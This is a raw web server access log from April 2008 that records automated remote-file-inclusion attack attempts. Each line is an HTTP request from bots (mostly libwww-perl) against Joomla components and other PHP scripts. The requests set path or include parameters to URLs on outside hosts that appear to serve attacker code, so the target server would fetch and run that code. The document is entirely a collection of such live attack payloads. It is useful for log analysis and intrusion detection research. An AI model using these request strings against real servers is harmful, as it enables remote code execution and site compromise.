210.109.102.108 - - [27/Apr/2008:19:20:01 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
83.3.167.234 - - [27/Apr/2008:19:20:11 -0600] "GET /logs/access_log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
64.15.138.183 - - [27/Apr/2008:19:20:11 -0600] "GET /logs/error_log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
83.3.167.234 - - [27/Apr/2008:19:20:11 -0600] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
83.3.167.234 - - [27/Apr/2008:19:20:11 -0600] "GET /logs//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
68.165.216.146 - - [27/Apr/2008:19:20:15 -0600] "GET /logs/access_log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
68.165.216.146 - - [27/Apr/2008:19:20:15 -0600] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
68.165.216.146 - - [27/Apr/2008:19:20:16 -0600] "GET /logs//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
66.98.216.89 - - [27/Apr/2008:19:20:18 -0600] "GET /logs/access_log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.812"
66.98.216.89 - - [27/Apr/2008:19:20:18 -0600] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.812"
66.98.216.89 - - [27/Apr/2008:19:20:18 -0600] "GET /logs//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.812"
66.98.216.89 - - [27/Apr/2008:19:20:35 -0600] "GET /logs/error_log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.812"
210.109.102.108 - - [27/Apr/2008:19:20:35 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
200.213.0.1 - - [27/Apr/2008:19:20:48 -0600] "GET /logs/access_log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
200.213.0.1 - - [27/Apr/2008:19:20:48 -0600] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
200.213.0.1 - - [27/Apr/2008:19:20:49 -0600] "GET /logs//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
83.3.167.234 - - [27/Apr/2008:19:20:50 -0600] "GET /logs/error_log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
68.165.216.146 - - [27/Apr/2008:19:21:17 -0600] "GET /logs/error_log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
200.213.0.1 - - [27/Apr/2008:19:21:37 -0600] "GET /logs/error_log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
64.15.138.183 - - [27/Apr/2008:19:22:29 -0600] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
210.109.102.108 - - [27/Apr/2008:19:22:32 -0600] "GET /logs/access_log.20080330/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
66.98.216.89 - - [27/Apr/2008:19:23:00 -0600] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.812"
195.14.1.101 - - [27/Apr/2008:19:23:20 -0600] "GET /logs/access_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
195.14.1.101 - - [27/Apr/2008:19:23:20 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
195.14.1.101 - - [27/Apr/2008:19:23:20 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
83.3.167.234 - - [27/Apr/2008:19:23:28 -0600] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
72.232.122.239 - - [27/Apr/2008:19:24:14 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.232.122.239 - - [27/Apr/2008:19:24:18 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.14.1.101 - - [27/Apr/2008:19:24:57 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
195.14.1.101 - - [27/Apr/2008:19:24:58 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
75.126.114.42 - - [27/Apr/2008:19:24:58 -0600] "GET /logs/access_log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.811"
75.126.114.42 - - [27/Apr/2008:19:24:58 -0600] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.811"
195.14.1.101 - - [27/Apr/2008:19:25:14 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
217.148.95.133 - - [27/Apr/2008:19:25:25 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 247 "-" "libwww-perl/5.76"
217.148.95.133 - - [27/Apr/2008:19:25:26 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 242 "-" "libwww-perl/5.76"
213.246.51.45 - - [27/Apr/2008:19:26:49 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
213.246.51.45 - - [27/Apr/2008:19:26:50 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
68.165.216.146 - - [27/Apr/2008:19:26:58 -0600] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
72.89.191.68 - - [27/Apr/2008:19:27:13 -0600] "GET //?mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 200 698 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
72.89.191.68 - - [27/Apr/2008:19:27:13 -0600] "GET /logs//?mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 200 1995 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
200.213.0.1 - - [27/Apr/2008:19:27:16 -0600] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
67.228.55.26 - - [27/Apr/2008:19:27:49 -0600] "GET /logs/access_log.20080330//ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:27:49 -0600] "GET //ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 230 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:27:49 -0600] "GET /logs//ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
82.165.148.225 - - [27/Apr/2008:19:28:28 -0600] "GET /logs/access_log.20080413/index.php?page=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
210.109.102.108 - - [27/Apr/2008:19:28:52 -0600] "GET /logs/error_log.20080330/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://h.hagag.free.fr/htdocs/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_dab934a7404e6c97e48f51f01088b1ff?? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
210.109.102.108 - - [27/Apr/2008:19:28:53 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://h.hagag.free.fr/htdocs/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_dab934a7404e6c97e48f51f01088b1ff?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
210.109.102.108 - - [27/Apr/2008:19:28:54 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://h.hagag.free.fr/htdocs/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_dab934a7404e6c97e48f51f01088b1ff?? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
67.228.55.26 - - [27/Apr/2008:19:28:55 -0600] "GET /logs/access_log//ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
69.72.211.242 - - [27/Apr/2008:19:30:55 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
69.72.211.242 - - [27/Apr/2008:19:30:55 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
69.72.211.242 - - [27/Apr/2008:19:30:55 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
69.72.211.242 - - [27/Apr/2008:19:30:55 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
210.109.102.108 - - [27/Apr/2008:19:31:27 -0600] "GET /logs/access_log.20080330/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://h.hagag.free.fr/htdocs/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_dab934a7404e6c97e48f51f01088b1ff?? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
67.228.55.26 - - [27/Apr/2008:19:32:38 -0600] "GET //ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 230 "-" "libwww-perl/5.811"
195.205.214.163 - - [27/Apr/2008:19:33:49 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
195.205.214.163 - - [27/Apr/2008:19:33:55 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
75.126.115.170 - - [27/Apr/2008:19:34:09 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
75.126.115.170 - - [27/Apr/2008:19:34:23 -0600] "GET /logs/error_log.20080330/components/com_performs/performs.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.811"
75.126.115.170 - - [27/Apr/2008:19:34:23 -0600] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
75.126.115.170 - - [27/Apr/2008:19:34:23 -0600] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
75.126.114.42 - - [27/Apr/2008:19:35:09 -0600] "GET /logs/access_log.20080413/pagina.php?type=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
75.126.114.42 - - [27/Apr/2008:19:35:09 -0600] "GET /pagina.php?type=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.811"
75.126.114.42 - - [27/Apr/2008:19:35:09 -0600] "GET /logs/pagina.php?type=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
75.126.115.170 - - [27/Apr/2008:19:35:26 -0600] "GET /logs/access_log.20080330/components/com_performs/performs.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:36:11 -0600] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:36:11 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 228 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:36:11 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
72.89.191.68 - - [27/Apr/2008:19:36:23 -0600] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
72.89.191.68 - - [27/Apr/2008:19:36:23 -0600] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
72.89.191.68 - - [27/Apr/2008:19:36:28 -0600] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
72.89.191.68 - - [27/Apr/2008:19:36:28 -0600] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
75.126.115.170 - - [27/Apr/2008:19:36:35 -0600] "GET /logs/error_log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
75.126.115.170 - - [27/Apr/2008:19:36:35 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
75.126.115.170 - - [27/Apr/2008:19:36:35 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.811"
195.205.214.163 - - [27/Apr/2008:19:37:18 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
67.228.55.26 - - [27/Apr/2008:19:37:18 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 228 "-" "libwww-perl/5.811"
195.205.214.163 - - [27/Apr/2008:19:37:18 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
195.205.214.163 - - [27/Apr/2008:19:37:19 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
75.126.115.170 - - [27/Apr/2008:19:37:34 -0600] "GET /logs/access_log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.811"
75.126.115.170 - - [27/Apr/2008:19:37:42 -0600] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:37:46 -0600] "GET /logs/access_log.20080406//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
88.214.192.29 - - [27/Apr/2008:19:37:48 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
88.214.192.29 - - [27/Apr/2008:19:37:48 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
88.214.192.29 - - [27/Apr/2008:19:37:48 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
69.73.146.54 - - [27/Apr/2008:19:37:49 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
69.73.146.54 - - [27/Apr/2008:19:37:49 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
69.73.146.54 - - [27/Apr/2008:19:37:49 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
69.73.146.54 - - [27/Apr/2008:19:37:50 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
69.73.146.54 - - [27/Apr/2008:19:37:50 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
69.73.146.54 - - [27/Apr/2008:19:37:50 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
69.73.146.54 - - [27/Apr/2008:19:37:56 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
88.214.192.29 - - [27/Apr/2008:19:37:56 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
69.73.146.54 - - [27/Apr/2008:19:37:58 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
64.22.111.162 - - [27/Apr/2008:19:38:00 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
64.22.111.162 - - [27/Apr/2008:19:38:00 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
64.22.111.162 - - [27/Apr/2008:19:38:00 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
195.205.214.163 - - [27/Apr/2008:19:38:02 -0600] "GET /logs/access_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
64.22.111.162 - - [27/Apr/2008:19:38:02 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
64.22.111.162 - - [27/Apr/2008:19:38:02 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
64.22.111.162 - - [27/Apr/2008:19:38:02 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
64.22.111.162 - - [27/Apr/2008:19:38:07 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
66.179.10.151 - - [27/Apr/2008:19:38:08 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
66.179.10.151 - - [27/Apr/2008:19:38:08 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
66.179.10.151 - - [27/Apr/2008:19:38:08 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
66.179.10.151 - - [27/Apr/2008:19:38:08 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
66.179.10.151 - - [27/Apr/2008:19:38:08 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
66.179.10.151 - - [27/Apr/2008:19:38:08 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
64.22.111.162 - - [27/Apr/2008:19:38:10 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
65.36.177.149 - - [27/Apr/2008:19:38:13 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
65.36.177.149 - - [27/Apr/2008:19:38:13 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
65.36.177.149 - - [27/Apr/2008:19:38:13 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
65.36.177.149 - - [27/Apr/2008:19:38:14 -0600] "GET /logs/access_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
65.36.177.149 - - [27/Apr/2008:19:38:14 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
65.36.177.149 - - [27/Apr/2008:19:38:14 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
66.179.10.151 - - [27/Apr/2008:19:38:15 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
66.179.10.151 - - [27/Apr/2008:19:38:15 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
65.36.177.149 - - [27/Apr/2008:19:38:22 -0600] "GET /logs/error_log//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
